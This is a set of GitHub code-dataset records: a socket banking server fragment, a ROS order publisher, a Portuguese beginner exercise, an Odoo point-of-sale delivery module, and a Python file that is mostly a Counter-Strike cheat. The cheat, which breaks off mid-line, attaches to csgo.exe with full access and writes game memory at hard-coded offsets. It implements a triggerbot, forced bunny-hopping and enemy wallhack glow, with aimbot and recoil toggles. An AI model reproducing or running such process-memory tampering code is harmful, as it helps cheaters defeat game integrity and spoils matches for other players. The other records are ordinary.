self.conn.commit()\n\n\n\n\n\n elif \"logout\" in message:\n break\n\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"\"\nport = 8000\nserver.bind((host, port))\nserver.listen(5)\n\nwhile True:\n print(\"Listening for a client...\")\n client, addr = server.accept()\n client1 = processServer(client, addr)\n client1.start()\n","repo_name":"anjielayo/AZBanking","sub_path":"other files/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32051847961","text":"#!/usr/bin/env python\n\nfrom jsk_arc2017_common.msg import WorkOrder\nfrom jsk_arc2017_common.msg import WorkOrderArray\nimport json\nimport os.path as osp\nimport rospy\n\n\nclass WorkOrderServer(object):\n\n abandon_items = [\n 'measuring_spoons',\n 'mesh_cup'\n ]\n\n def __init__(self):\n json_dir = rospy.get_param('~json_dir', None)\n self.rate = rospy.get_param('~rate', 1.0)\n if json_dir is None:\n rospy.logerr('must set json dir path to ~json_dir')\n return\n location_path = osp.join(json_dir, 'item_location_file.json')\n with open(location_path) as location_f:\n bins = json.load(location_f)['bins']\n order_path = osp.join(json_dir, 'order_file.json')\n with open(order_path) as order_f:\n orders = json.load(order_f)['orders']\n\n self.item_location = {}\n for bin_ in bins:\n bin_id = bin_['bin_id']\n for item_name in bin_['contents']:\n self.item_location[item_name] = bin_id\n\n self.cardboard_ids = {}\n for order in orders:\n size_id = order['size_id']\n num_contents = len(order['contents'])\n if num_contents == 2:\n self.cardboard_ids[size_id] = 'A'\n elif num_contents == 3:\n self.cardboard_ids[size_id] = 'B'\n else:\n self.cardboard_ids[size_id] = 'C'\n\n larm_orders = orders[:2]\n rarm_orders = orders[2:3]\n self.larm_msg = self._generate_msg(larm_orders)\n self.rarm_msg = self._generate_msg(rarm_orders)\n self.larm_pub = rospy.Publisher(\n '~left_hand', WorkOrderArray, queue_size=1)\n self.rarm_pub = rospy.Publisher(\n '~right_hand', WorkOrderArray, queue_size=1)\n rospy.Timer(rospy.Duration(1.0 / self.rate), self._publish_msg)\n\n def _generate_msg(self, orders):\n order_msgs = []\n for order in orders:\n size_id = order['size_id']\n for target_item in order['contents']:\n if target_item in self.abandon_items:\n continue\n order_msg = WorkOrder()\n order_msg.bin = self.item_location[target_item]\n order_msg.item = target_item\n order_msg.box = self.cardboard_ids[size_id]\n order_msgs.append(order_msg)\n order_array_msg = WorkOrderArray()\n order_array_msg.orders = order_msgs\n return order_array_msg\n\n def _publish_msg(self, event):\n self.larm_pub.publish(self.larm_msg)\n self.rarm_pub.publish(self.rarm_msg)\n\nif __name__ == '__main__':\n rospy.init_node('work_order_server')\n work_order_server = WorkOrderServer()\n rospy.spin()\n","repo_name":"mmurooka/jsk_apc","sub_path":"jsk_arc2017_common/node_scripts/work_order_publisher.py","file_name":"work_order_publisher.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"45575602375","text":"#!/usr/bin/env python3\n\n\"\"\"\nFaça um algoritmo que \nlê o nome de um vendedor, \nlê o salário fixo do vendedor,\nlê o total (em reais) de vendas por ele efetuadas e \nlê o percentual que ganha sobre o total de vendas. \nO algoritmo deve calcular o salário total do vendedor e exibir, \n+ ao final, a seguinte frase:\n\nO vendedor recebeu reais.\n\"\"\"\n\nname = str(input(\"Ola vendedor! digite seu nome: \", ))\nsalario_fixo = float(input(\"Digite seu salario fixo: \", ))\nsalario_vendas = float(input(\"Digite o valor do total de vendas: \", ))\nsalario_percentual = float(input(\"Digite o percentual de ganho das vendas: \", ))\n\nsalario_total = salario_fixo+salario_vendas+salario_percentual \n\nprint(\"\\nO vendedor\", name, \"recebeu\", salario_total ,\"reais.\")","repo_name":"DIEGOHORVATTI/IFC","sub_path":"caderno/1_semestre/algoritimos/aula_4/14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7808774581","text":"import logging\nfrom datetime import timedelta\nfrom functools import partial\n\nimport psycopg2\nimport pytz\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.tools import float_is_zero, float_round\nfrom odoo.exceptions import ValidationError, UserError\nfrom odoo.http import request\nfrom odoo.osv.expression import AND\nimport base64\n\n_logger = logging.getLogger(__name__)\n\n\nclass PosConfig(models.Model):\n\t_inherit = 'pos.config'\n\n\tpos_verify_delivery = fields.Boolean(string='Home Delivery')\n\tpos_users = fields.Many2many(\n\t comodel_name='res.users', relation='pos_config_users_rel')\n\n\nclass ResConfigSettings(models.TransientModel):\n\t_inherit = 'res.config.settings'\n\n\tpos_res_verify_delivery = fields.Boolean(related='pos_config_id.pos_verify_delivery', readonly=False)\n\t\n\nclass ProductDeliveryCharge(models.Model):\n\t_inherit = 'product.product'\n\t\n\tis_home_delivery_charge = fields.Boolean('Delivery Charge')\n\n\nclass AccountJournal(models.Model):\n\t_inherit = 'account.journal'\n\n\tis_home_delivery = fields.Boolean('Use as Home Delivery', help='if you use this journal as home delivery, it will not create any payment entries for that order')\n\n\nclass account_journal(models.Model):\n\t_inherit = 'pos.payment.method'\n\n\tis_home_delivery = fields.Boolean(string='Use as Home Delivery',related='journal_id.is_home_delivery',readonly=False)\n\n\t@api.constrains('is_home_delivery')\n\tdef _check_home_delivery_method(self):\n\t\thome_payment_method = self.env['pos.payment.method'].search_count([('is_home_delivery', '=', True)])\n\t\tif home_payment_method > 1:\n\t\t\traise UserError(_(\"Already one payment selected as home delivery , you can not create multiple home delivery methods.\"))\n\nclass PosOrder(models.Model):\n\t_inherit = 'pos.order'\n\n\tdelivery_order = fields.Boolean(string='Is Home Delivery Order')\n\n\tdef write(self, vals):\n\t\tfor order in self :\n\t\t\tif order.name == '/' and order.delivery_order :\n\t\t\t\tvals['name'] = order.config_id.sequence_id._next()\n\t\treturn super(PosOrder, self).write(vals)\n\n\t@api.model\n\tdef _order_fields(self, ui_order):\n\t\tres = super(PosOrder, self)._order_fields(ui_order)\n\t\tres['delivery_order'] = ui_order.get('delivery') or False\n\t\treturn res\n\t\n\t@api.model\n\tdef create_from_ui(self, orders, draft=False):\n\t\tpos_order_ids = super(PosOrder, self).create_from_ui(orders, draft)\n\t\tfor order in pos_order_ids:\n\t\t\torder_rec = self.browse(order.get('id'))\n\t\t\tref_order = [o['data'] for o in orders if o['data'].get('name') == order_rec.pos_reference]\n\t\t\tdelivery_ids = self.env['pos.delivery.order'].sudo().search([('order_no', '=', order_rec.pos_reference)])\n\t\t\tif delivery_ids:\n\t\t\t\tdelivery_ids.write({'pos_order_id': order.get('id')})\n\t\t\t\torder_rec.write({'state': 'done'})\n\t\treturn pos_order_ids\n\n\tdef _process_payment_lines(self, pos_order, order, pos_session, draft):\n\t\t\"\"\"Create account.bank.statement.lines from the dictionary given to the parent function.\n\n\t\tIf the payment_line is an updated version of an existing one, the existing payment_line will first be\n\t\tremoved before making a new one.\n\t\t:param pos_order: dictionary representing the order.\n\t\t:type pos_order: dict.\n\t\t:param order: Order object the payment lines should belong to.\n\t\t:type order: pos.order\n\t\t:param pos_session: PoS session the order was created in.\n\t\t:type pos_session: pos.session\n\t\t:param draft: Indicate that the pos_order is not validated yet.\n\t\t:type draft: bool.\n\t\t\"\"\"\n\t\tprec_acc = order.pricelist_id.currency_id.decimal_places\n\n\t\torder_bank_statement_lines= self.env['pos.payment'].search([('pos_order_id', '=', order.id)])\n\t\torder_bank_statement_lines.unlink()\n\t\tif not order.delivery_order :\n\t\t\tfor payments in pos_order['statement_ids']:\n\t\t\t\tif not float_is_zero(payments[2]['amount'], precision_digits=prec_acc):\n\t\t\t\t\torder.add_payment(self._payment_fields(order, payments[2]))\n\n\t\torder.amount_paid = sum(order.payment_ids.mapped('amount'))\n\t\tif not draft and not float_is_zero(pos_order['amount_return'], prec_acc):\n\t\t\tcash_payment_method = pos_session.payment_method_ids.filtered('is_cash_count')[:1]\n\t\t\tif not cash_payment_method:\n\t\t\t\traise UserError(_(\"No cash statement found for this session. Unable to record returned cash.\"))\n\t\t\treturn_payment_vals = {\n\t\t\t\t'name': _('return'),\n\t\t\t\t'pos_order_id': order.id,\n\t\t\t\t'amount': -pos_order['amount_return'],\n\t\t\t\t'payment_date': fields.Datetime.now(),\n\t\t\t\t'payment_method_id': cash_payment_method.id,\n\t\t\t\t'is_change': True,\n\t\t\t}\n\t\t\torder.add_payment(return_payment_vals)\n\n\n\t@api.model\n\tdef _process_order(self, order, draft, existing_order):\n\t\t\"\"\"Create or update an pos.order from a given dictionary.\n\n\t\t:param dict order: dictionary representing the order.\n\t\t:param bool draft: Indicate that the pos_order is not validated yet.\n\t\t:param existing_order: order to be updated or False.\n\t\t:type existing_order: pos.order.\n\t\t:returns: id of created/updated pos.order\n\t\t:rtype: int\n\t\t\"\"\"\n\t\torder = order['data']\n\t\tpos_session = self.env['pos.session'].browse(order['pos_session_id'])\n\t\tif pos_session.state == 'closing_control' or pos_session.state == 'closed':\n\t\t\torder['pos_session_id'] = self._get_valid_session(order).id\n\n\t\tpos_order = False\n\t\tif not existing_order:\n\t\t\tpos_order = self.create(self._order_fields(order))\n\t\telse:\n\t\t\tpos_order = existing_order\n\t\t\tpos_order.lines.unlink()\n\t\t\torder['user_id'] = pos_order.user_id.id\n\t\t\tpos_order.write(self._order_fields(order))\n\n\t\tpos_order = pos_order.with_company(pos_order.company_id)\n\t\tself = self.with_company(pos_order.company_id)\n\t\tself._process_payment_lines(order, pos_order, pos_session, draft)\n\n\t\tif not draft and not pos_order.delivery_order:\n\t\t\ttry:\n\t\t\t\tpos_order.action_pos_order_paid()\n\t\t\texcept psycopg2.DatabaseError:\n\t\t\t\t# do not hide transactional errors, the order(s) won't be saved!\n\t\t\t\traise\n\t\t\texcept Exception as e:\n\t\t\t\t_logger.error('Could not fully process the POS Order: %s', tools.ustr(e))\n\n\t\tpos_order._create_order_picking()\n\n\t\tif pos_order.to_invoice and pos_order.state == 'paid':\n\t\t\tpos_order._generate_pos_order_invoice()\n\n\t\treturn pos_order.id\n\n\nclass POSSession(models.Model):\n\t_inherit = 'pos.session'\n\n\tdef load_pos_data(self):\n\t\tloaded_data = {}\n\t\tself = self.with_context(loaded_data=loaded_data)\n\t\tfor model in self._pos_ui_models_to_load():\n\t\t\tloaded_data[model] = self._load_model(model)\n\t\tself._pos_data_process(loaded_data) \n\t\tusers_data = self._get_pos_ui_pos_res_users(self._loader_params_pos_res_users())\n\t\tproduct_data = self._get_pos_ui_pos_product_product(self._loader_params_pos_product_product())\n\t\tloaded_data['users'] = users_data\n\t\tloaded_data['product_delivery'] = product_data\n\t\treturn loaded_data\n\n\tdef _loader_params_pos_product_product(self):\n\t\treturn {\n\t\t\t'search_params': {\n\t\t\t\t'domain': ['|', ('sale_ok', '=', True), ('available_in_pos', '=', True)],\n\t\t\t\t'fields': ['display_name', 'list_price','lst_price','pos_categ_id', 'taxes_id', 'barcode', 'default_code', 'to_weight', 'uom_id', 'description_sale', 'description', 'categ_id', 'product_tmpl_id','tracking','is_home_delivery_charge'],\n\t\t\t},\n\t\t}\n\n\tdef _get_pos_ui_pos_product_product(self, params):\n\t\tproducts = self.env['product.product'].search_read(**params['search_params'])\n\t\treturn products\n\n\n\tdef _loader_params_pos_res_users(self):\n\t\treturn {\n\t\t\t'search_params': {\n\t\t\t\t'domain': [],\n\t\t\t\t'fields': ['name', 'groups_id'],\n\t\t\t},\n\t\t}\n\n\tdef _get_pos_ui_pos_res_users(self, params):\n\t\tusers = self.env['res.users'].search_read(**params['search_params'])\n\t\treturn users\n\n\tdef _loader_params_pos_payment_method(self):\n\t\tresult = super()._loader_params_pos_payment_method()\n\t\tresult['search_params']['fields'].append('is_home_delivery')\n\t\treturn result\n\n\tdef _loader_params_res_partner(self):\n\t\tresult = super()._loader_params_res_partner()\n\t\tresult['search_params']['fields'].append('street2')\n\t\treturn result\n\n\tdef get_closing_control_data(self):\n\t\tself.ensure_one()\n\t\torders = self.order_ids.filtered(lambda o: o.delivery_order == True or o.state == 'paid' or o.state == 'invoiced')\n\t\tpayments = orders.payment_ids.filtered(lambda p: p.payment_method_id.type != \"pay_later\")\n\t\tpay_later_payments = orders.payment_ids - payments\n\t\tcash_payment_method_ids = self.payment_method_ids.filtered(lambda pm: pm.type == 'cash')\n\t\tdefault_cash_payment_method_id = cash_payment_method_ids[0] if cash_payment_method_ids else None\n\t\ttotal_default_cash_payment_amount = sum(payments.filtered(lambda p: p.payment_method_id == default_cash_payment_method_id).mapped('amount')) if default_cash_payment_method_id else 0\n\t\tother_payment_method_ids = self.payment_method_ids - default_cash_payment_method_id if default_cash_payment_method_id else self.payment_method_ids\n\t\tcash_in_count = 0\n\t\tcash_out_count = 0\n\t\tcash_in_out_list = []\n\t\tfor cash_move in self.statement_line_ids.sorted('create_date'):\n\t\t\tif cash_move.amount > 0:\n\t\t\t\tcash_in_count += 1\n\t\t\t\tname = f'Cash in {cash_in_count}'\n\t\t\telse:\n\t\t\t\tcash_out_count += 1\n\t\t\t\tname = f'Cash out {cash_out_count}'\n\t\t\tcash_in_out_list.append({\n\t\t\t\t'name': cash_move.payment_ref if cash_move.payment_ref else name,\n\t\t\t\t'amount': cash_move.amount\n\t\t\t})\n\n\t\treturn {\n\t\t\t'orders_details': {\n\t\t\t\t'quantity': len(orders),\n\t\t\t\t'amount': sum(orders.mapped('amount_total'))\n\t\t\t},\n\t\t\t'payments_amount': sum(payments.mapped('amount')),\n\t\t\t'pay_later_amount': sum(pay_later_payments.mapped('amount')),\n\t\t\t'opening_notes': self.opening_notes,\n\t\t\t'default_cash_details': {\n\t\t\t\t'name': default_cash_payment_method_id.name,\n\t\t\t\t'amount': self.cash_register_balance_start \n\t\t\t\t\t\t\t+ total_default_cash_payment_amount \n\t\t\t\t\t\t\t+ sum(self.statement_line_ids.mapped('amount')),\n\t\t\t\t'opening': self.cash_register_balance_start,\n\t\t\t\t'payment_amount': total_default_cash_payment_amount,\n\t\t\t\t'moves': cash_in_out_list,\n\t\t\t\t'id': default_cash_payment_method_id.id\n\t\t\t} if default_cash_payment_method_id else None,\n\t\t\t'other_payment_methods': [{\n\t\t\t\t'name': pm.name,\n\t\t\t\t'amount': sum(orders.payment_ids.filtered(lambda p: p.payment_method_id == pm).mapped('amount')),\n\t\t\t\t'number': len(orders.payment_ids.filtered(lambda p: p.payment_method_id == pm)),\n\t\t\t\t'id': pm.id,\n\t\t\t\t'type': pm.type,\n\t\t\t} for pm in other_payment_method_ids],\n\t\t\t'is_manager': self.user_has_groups(\"point_of_sale.group_pos_manager\"),\n\t\t\t'amount_authorized_diff': self.config_id.amount_authorized_diff if self.config_id.set_maximum_difference else None\n\t\t}","repo_name":"amg15490/KK","sub_path":"pos_home_delivery/models/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":10275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70155460212","text":"# name = input(\"hello, whats your name? \")\n# print(\"hello {0}\".format(name))\n# age = int(input(\"how old are u? \"))\n#\n# if (age < 18) or (age >30):\n# print('sorry u cant go with us')\n# else:\n# print(\"great, u can go with us {0}\".format(name))\n\n# for b in range(-10,-2):\n# print(\"number {}\".format(b))\n\n# shoping_list = [\"milk\", \"coffe\", \"bread\", \"bacon\"]\n# for item in shoping_list:\n# print(\"=====\")\n# if item == 'milk':\n# continue\n# print(\"buy \"+item)\n\n# ip = input(\"enter ip: \")\n#\n# segment = 1\n# lenght = 0\n# char = \"\"\n# for char in ip:\n# if char == \".\":\n# print(\"segment {} contain {} numbers\".format(segment, lenght))\n# segment += 1\n# lenght = 0\n# else:\n# lenght += 1\n# if char != \".\":\n# print(\"segment {} contain {} numbers\".format(segment, lenght))\n\n# exits = ['1', '2', '3']\n#\n# taken = \"\"\n# while taken not in exits:\n# exits = input(\"choose exit: \")\n# if taken == exits:\n# print(\"good choice\")\n# else:\n# print(\"wrong guess\")\n#\n# farm = {\"cow\", \"pig\", \"dog\"}\n#\n#\n# for anim in farm:\n# print(anim)\n# print('='*40)\n#\n# farm.add(\"horse\")\n# print(anim)\n# from typing import Tuple, List\n\n# even = set(range(0, 20, 2))\n# print(even)\n# print(len(even))\n# print('='*40)\n#\n# print(sorted(even))\n#\n# square_t = (4, 16, 36, 64)\n# square = set(square_t)\n# print(even.union(square))\n# print(len(even.union(square)))\n# print('='*40)\n# print(even.intersection(even))\n# print(even&square)\n# words = []\n# words = input(\"type something: \")\n#\n# print(sorted(words))\n#\n# vowels = frozenset(\"a\")\n#\n# print(sorted(vowels.symmetric_difference(words)))\n\n# jab = open(\"sample.txt\", 'r')\n# for line in jab:\n# if \"\\n\" in line:\n# print(sorted(line), end='')\n# break\n# # else:\n# # print(sorted(line))\n#\n# jab.close()\n#\n# with open(\"sample.txt\", 'r') as jab:\n# for line in jab:\n# if \"\\n\" in jab:\n# print(sorted(line))\n# break\n\n# cities = [\"dublin\", \"cork\", \"kilkenny\"]\n#\n# with open(\"cities.txt\", 'w') as city_file:\n# for city in cities:\n# print(city, file=city_file)\n\n# import turtle\n# import time\n#\n# turtle.forward(150)\n# turtle.right(250)\n# turtle.forward(150)\n#\n# time.sleep(10)\n\n# for i in dir(__builtins__):\n# print(i)\n#\n# import webbrowser\n#\n# chrome = webbrowser.get(using='chrome')\n#\n# chrome.open_new_tab(\"https://www.python.org\")\n\n# import time\n\n# print(time.gmtime(0))\n#\n# print(time.localtime())\n#\n# print(time.time())\n\n# import time\n# from time import perf_counter as timer\n# import random\n#\n#\n# print(\"press enter to start \")\n#\n# wait_time = random.randint(1, 6)\n# time.sleep(wait_time)\n# start_time = timer()\n# input(\"press enter to stop\")\n#\n# end_time = timer()\n#\n# print(\"started at \" + time.strftime(\"%X\", time.localtime(start_time)))\n# print(\"ended at \" + time.strftime(\"%X\", time.localtime(end_time)))\n#\n# print(\"your reaction time was {} seconds\".format(end_time - start_time))\n\n# from time import monotonic\n#\n# monotonic()\n#\n# from time import perf_counter\n#\n# print(perf_counter())\n\n# import time\n#\n# print(\"Epoch on this system starts at: \" + time.strftime('%c', time.gmtime(0)))\n#\n# print(\"Current timezone is {0} with offset of {1}\".format(time.tzname[0], time.timezone))\n#\n# if time.daylight != 0:\n# print(\"Daylight saving is in effect in this location\")\n# print(\"DTS timezone is \" + time.tzname[1])\n#\n# print(\"Local time is: \" + time.strftime('%Y-%m-%d %H:%M', time.localtime()))\n# print(\"UTC time is \" + time.strftime('%Y/%m/%d %H:%M', time.gmtime()))\n\n# import pytz\n# import datetime\n\nimport ctypes\nimport os\nfrom ctypes import *\nfrom ctypes.wintypes import *\nimport psutil\nimport sys\nimport win32api\nimport win32con\nfrom ctypes import wintypes\nimport time\nimport struct\nimport thread\nimport random\nimport math\nimport numpy\nimport binascii\n\n\n\nclear = lambda: os.system('cls')\n\noff_teamnum = 0xF0\noff_flags = 0x100\noff_incrosshair = 0xB2B4\noff_health = 0xFC\noff_glowindex = 0xA320\noff_vecorigin = 0x134\noff_velocity = 0x110\noff_shotsfired = 0xA2C0\noff_spotted = 0x00000939\noff_dormant = 0x000000E9\noff_aimpunch = 0x301C\noff_vecviewoffset = 0x104\noff_bonematrix = 0x00002698\noff_dwviewangle = 0x4D10\noff_clientdll = 0\n\noff_localplayer = 0xAAFFEC\noff_entitylist = 0x4A8C844\noff_forcejump = 0x4F237DC\noff_glowobject = 0x4FA9848\noff_clientstate = 0x5A3334\n\n\noff_activeweapon = 0x2EE8\noff_itemidlow = 0x2FA4\noff_itemidhigh = 0x2FA0\noff_fallbackpaintkit = 0x3170\noff_fallbackseed = 0x3174\noff_fallbackwear = 0x3178\noff_itemdefinition = 0x2F88\noff_weaponid = 0x000032EC\n\n\nswitch = True\ntriggeronoff = False\nglowonoff = True\nbhoponoff = True\ncleverglowonoff = False\naimonoff = False\nrcsonoff = True\ntest = True\n\naimbone = 8\naimfov = 1.5\ntriggerdelay = 0.0\n\n\n\nclass THREADENTRY32(Structure):\n _fields_ = [\n ('dwSize' , c_long ),\n ('cntUsage' , c_long),\n ('th32ThreadID' , c_long),\n ('th32OwnerProcessID' , c_long),\n ('tpBasePri' , c_long),\n ('tpDeltaPri' , c_long),\n ('dwFlags' , c_long) ]\n\nclass MODULEENTRY32(Structure):\n _fields_ = [ ( 'dwSize' , c_long ) ,\n ( 'th32ModuleID' , c_long ),\n ( 'th32ProcessID' , c_long ),\n ( 'GlblcntUsage' , c_long ),\n ( 'ProccntUsage' , c_long ) ,\n ( 'modBaseAddr' , c_long ) ,\n ( 'modBaseSize' , c_long ) ,\n ( 'hModule' , c_void_p ) ,\n ( 'szModule' , c_char * 256 ),\n ( 'szExePath' , c_char * 260 ) ]\n\nModule32First = windll.kernel32.Module32First\nModule32First.argtypes = [ c_void_p , POINTER(MODULEENTRY32) ]\nModule32First.rettype = c_int\n## Module32Next\nModule32Next = windll.kernel32.Module32Next\nModule32Next.argtypes = [ c_void_p , POINTER(MODULEENTRY32) ]\nModule32Next.rettype = c_int\n## Thread32First\nThread32First = windll.kernel32.Thread32First\nThread32First.argtypes = [ c_void_p , POINTER(THREADENTRY32) ]\nThread32First.rettype = c_int\n## Thread32Next\nThread32Next = windll.kernel32.Thread32Next\nThread32Next.argtypes = [ c_void_p , POINTER(THREADENTRY32) ]\nThread32Next.rettype = c_int\n## GetLastError\nGetLastError = windll.kernel32.GetLastError\nGetLastError.rettype = c_long\n\n\n\n\nCreateToolhelp32Snapshot = windll.kernel32.CreateToolhelp32Snapshot\ndef GetModuleBase(PID,ModuleName):\n hModuleSnap = CreateToolhelp32Snapshot( 0x00000008, PID );\n me32 = MODULEENTRY32()\n me32.dwSize = sizeof(MODULEENTRY32)\n Module32First( hModuleSnap, byref(me32))\n base = None\n while True:\n if (me32.szModule.lower()==ModuleName.lower()):\n base=me32.modBaseAddr\n break\n if not Module32Next(hModuleSnap, byref(me32)):\n break\n CloseHandle(hModuleSnap)\n return base\n\ntaskid = \"nothing\"\nOpenProcess = windll.kernel32.OpenProcess\nCloseHandle = windll.kernel32.CloseHandle\nPROCESS_ALL_ACCESS = 0x1F0FFF\n\nfor proc in psutil.process_iter():\n if proc.name() == \"csgo.exe\":\n taskid = proc.pid\n (taskid)\n print(\"Found csgo, script will start...\")\n\nif taskid == \"nothing\":\n raw_input(\"Please make sure csgo is running, script will exit now...\")\n quit()\n\n\n\n\noff_clientdll = GetModuleBase(taskid, \"client.dll\")\noff_enginedll = GetModuleBase(taskid, \"engine.dll\")\n\nbuffer1 = c_char_p(b\"\")\nval1 = c_int()\nbufferSize1 = len(buffer1.value)\nbytesRead1 = c_ulong(0)\n\nbuffer2 = c_char_p(b\"\")\nval2 = c_int()\nbufferSize2 = len(buffer2.value)\nbytesRead2 = c_ulong(0)\n\n\n\n\n\ngame = windll.kernel32.OpenProcess(PROCESS_ALL_ACCESS, 0, taskid)\nReadProcessMemory = windll.kernel32.ReadProcessMemory\nWriteProcessMemory = windll.kernel32.WriteProcessMemory\n\n\n\ndef getlenght(type):\n if type == \"i\":\n return 4\n elif type == \"f\":\n return 4\n elif type == \"c\":\n return 1\n\ndef float_to_hex(f):\n return struct.pack('f', f)\n\ndef read_memory(game, address, type):\n buffer = (ctypes.c_byte * getlenght(type))()\n bytesRead = ctypes.c_ulonglong(0)\n readlenght = getlenght(type)\n ReadProcessMemory(game, address, buffer, readlenght, byref(bytesRead))\n return struct.unpack(type, buffer)[0]\n\ndef write_memory(game, address, data, type):\n count = c_ulong(0)\n if type == \"f\":\n buffer = (float_to_hex(data))\n\n elif type == \"i\":\n buffer = struct.pack(\"i\", data)\n\n elif type == \"c\":\n buffer = chr(data)\n\n lenght = getlenght(type)\n WriteProcessMemory(game, address, buffer, lenght, byref(count))\n\n\ndef printer():\n clear()\n print(\"Settings: +++ Aimfov = \" + str(aimfov) + \" +++ Aimbone: \" + str(aimbone) + \" +++ Triggerdelay: \" + str(triggerdelay) + \" +++\")\n print(\"\")\n print(\"\")\n print(\"\")\n print(\"\")\n print(\" - Bunnyhop: \" + str(bhoponoff))\n print(\"\")\n print(\" - Triggerbot: \" + str(triggeronoff))\n print(\"\")\n print(\" - Glow: \" + str(glowonoff))\n print(\"\")\n print(\" - Cleverglow: \" + str(cleverglowonoff))\n print(\"\")\n print(\" - Recoilsystem: \" + str(rcsonoff))\n print(\"\")\n print(\" - Aimbot: \" + str(aimonoff))\n print(\"\")\n\n\n\n\ndef triggerthread():\n while switch:\n if triggeronoff:\n time.sleep(0.01)\n locaplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n myteam = read_memory(game,(locaplayer + off_teamnum), \"i\")\n incrosshair = read_memory(game,(locaplayer + off_incrosshair), \"i\")\n if incrosshair != 0:\n incrosshair_entity = read_memory(game,(off_clientdll + off_entitylist + ((incrosshair -1) * 0x10)), \"i\")\n incrosshair_team = read_memory(game,(incrosshair_entity + off_teamnum), \"i\")\n #one = read_memory(game,(incrosshair_entity + 0x8), \"i\")\n #two = read_memory(game,(one + 2 * 0x4), \"i\")\n #three = read_memory(game,(two + 0x1), \"i\")\n #classid = read_memory(game,(three + 0x14), \"i\")\n\n\n if myteam != incrosshair_team: #and classid == 35:\n if triggerdelay > 0:\n time.sleep(triggerdelay)\n\n if win32api.GetAsyncKeyState(0x39) == False:\n\n ctypes.windll.user32.mouse_event(2, 0, 0, 0,0)\n ctypes.windll.user32.mouse_event(4, 0, 0, 0,0)\n\n\n\ndef bhopthread():\n while switch:\n if bhoponoff:\n time.sleep(0.01)\n locaplayer1 = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n flags = read_memory(game,(locaplayer1 + off_flags), \"i\")\n\n if flags & (1 << 0) and win32api.GetAsyncKeyState(0x12):\n write_memory(game, (off_clientdll + off_forcejump), 6, \"i\")\n\n\ndef glowthread():\n while switch:\n if glowonoff:\n time.sleep(0.01)\n glowlocalplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n\n glowpointer = read_memory(game,(off_clientdll + off_glowobject), \"i\")\n\n glowteam = read_memory(game,(glowlocalplayer + off_teamnum), \"i\")\n\n for i in range(1, 64):\n\n player = read_memory(game,(off_clientdll + off_entitylist + ((i -1) * 0x10)), \"i\")\n\n\n\n health = read_memory(game,(player + off_health), \"i\")\n\n\n glowteam_enemy = read_memory(game,(player + off_teamnum), \"i\")\n\n\n inject = read_memory(game,(player + off_glowindex), \"i\")\n\n\n if health > 0 and glowteam != glowteam_enemy:\n\n\n red = ((255 - 2.55 * health) / 255)\n if red > 1:\n red = 1.0\n green = ((2.55*health) / 255)\n if green > 1.0:\n green = 1.0\n\n write_memory(game, (glowpointer + (inject * 0x38 + 0x4)), red, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x8)), green, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0xC)), 0.0, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x10)), 0.8, \"f\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (glowpointer + (inject * 0x38 + 0x26)), False, \"c\")\n\n\n\ndef cleverglow():\n while switch:\n if cleverglowonoff:\n time.sleep(0.01)\n\n cleverglowlocalplayer = read_memory(game,(off_clientdll + off_localplayer), \"i\")\n\n cleverglowpointer = read_memory(game,(off_clientdll + off_glowobject), \"i\")\n\n cleverglowteam = read_memory(game,(cleverglowlocalplayer + off_teamnum), \"i\")\n\n for z in range(1, 64):\n\n cleverglowplayer = read_memory(game,(off_clientdll + off_entitylist + ((z -1) * 0x10)), \"i\")\n\n\n\n\n\n cleverglowhealth = read_memory(game,(cleverglowplayer + off_health), \"i\")\n cleverglowteam_enemy = read_memory(game,(cleverglowplayer + off_teamnum), \"i\")\n\n\n\n if cleverglowhealth > 0 and cleverglowteam != cleverglowteam_enemy:\n\n localplayerx = read_memory(game,(cleverglowlocalplayer + off_vecorigin), \"f\")\n localplayery = read_memory(game,(cleverglowlocalplayer + off_vecorigin + 0x04), \"f\")\n\n\n\n enemyx = read_memory(game,(cleverglowplayer + off_vecorigin), \"f\")\n enemyy = read_memory(game,(cleverglowplayer + off_vecorigin + 0x04), \"f\")\n\n\n distx = localplayerx - enemyx\n disty = localplayery - enemyy\n\n finaldist = ((distx * distx) + (disty * disty))\n finaldist = (math.sqrt(finaldist))\n cleverglowpointer = read_memory(game,(off_clientdll + off_glowobject), \"i\")\n cleverinject = read_memory(game,(cleverglowplayer + off_glowindex), \"i\")\n dormant = read_memory(game,(cleverglowplayer + off_dormant), \"i\")\n spotted = read_memory(game,(cleverglowplayer + off_spotted), \"i\")\n cleverglowspeed = read_memory(game,(cleverglowplayer + off_velocity), \"f\")\n\n if finaldist < 1300 and cleverglowspeed > 130:\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 0.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0xC)), 1.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x10)), 0.7, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x24)), True, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x25)), False, \"c\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x26)), False, \"c\")\n elif dormant > 0 or spotted != 0:\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x4)), 0.0, \"f\")\n write_memory(game, (cleverglowpointer + (cleverinject * 0x38 + 0x8)), 